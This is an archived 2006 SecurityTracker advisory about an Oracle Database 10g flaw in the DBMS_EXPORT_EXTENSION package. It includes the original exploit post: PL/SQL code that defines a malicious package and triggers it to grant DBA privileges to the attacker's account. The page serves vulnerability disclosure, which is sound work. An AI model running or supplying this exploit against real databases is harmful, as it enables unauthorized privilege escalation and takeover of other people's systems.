SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Database)  >  Oracle Database Vendors:  Oracle
Oracle Database DBMS_EXPORT_EXTENSION Package Lets Remote Users Execute Arbitrary Functions
SecurityTracker Alert ID:  1015999
SecurityTracker URL:  http://securitytracker.com/id?1015999
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 26 2006
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 10.2.0.2.0
Description:  A vulnerability was reported in Oracle Database. A remote authenticated user can execute arbitrary functions on the database.

A remote authenticated user can invoke the DBMS_EXPORT_EXTENSION package to open a user-supplied object and have the object execute an arbitrary function.

The vendor was notified on February 19, 2006 by NGSSoftware, which separately discovered this vulnerability.

N1V1Hd $3c41r3 originally disclosed this vulnerability.
Impact:  A remote authenticated user can execute arbitrary functions on the target system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.oracle.com/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
Reported By:  "putosoft softputo" <hasecorp@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Wed, 19 Apr 2006 08:33:56 +0000
From:  "putosoft softputo" <hasecorp@hotmail.com>
Subject:  Oracle 10g 10.2.0.2.0 DBA exploit

 
/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
 
* Patch your database now!
 
* by N1V1Hd $3c41r3
 
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)
   RETURN NUMBER;
END;
 

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)
    RETURN NUMBER
  IS
   pragma autonomous_transaction;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;

END;
 

DECLARE
  INDEX_NAME VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME VARCHAR2(200);
  TYPE_SCHEMA VARCHAR2(200);
  VERSION VARCHAR2(200);
  NEWBLOCK PLS_INTEGER;
  GMFLAGS NUMBER;
  v_Return VARCHAR2(200);
BEGIN
  INDEX_NAME := 'A1';  INDEX_SCHEMA := 'HACKER';
  TYPE_NAME := 'MYBADPACKAGE';  TYPE_SCHEMA := 'HACKER';
  VERSION := '10.2.0.2.0';  GMFLAGS := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    INDEX_NAME => INDEX_NAME,    INDEX_SCHEMA => INDEX_SCHEMA,    TYPE_NAME 
=> TYPE_NAME,
    TYPE_SCHEMA => TYPE_SCHEMA,    VERSION => VERSION,    NEWBLOCK => 
NEWBLOCK,    GMFLAGS => GMFLAGS
	  );
END;
 

_________________________________________________________________
Acepta el reto MSN Premium: Correos más divertidos con fotos y textos 
increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis. 
http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2006, SecurityGlobal.net LLC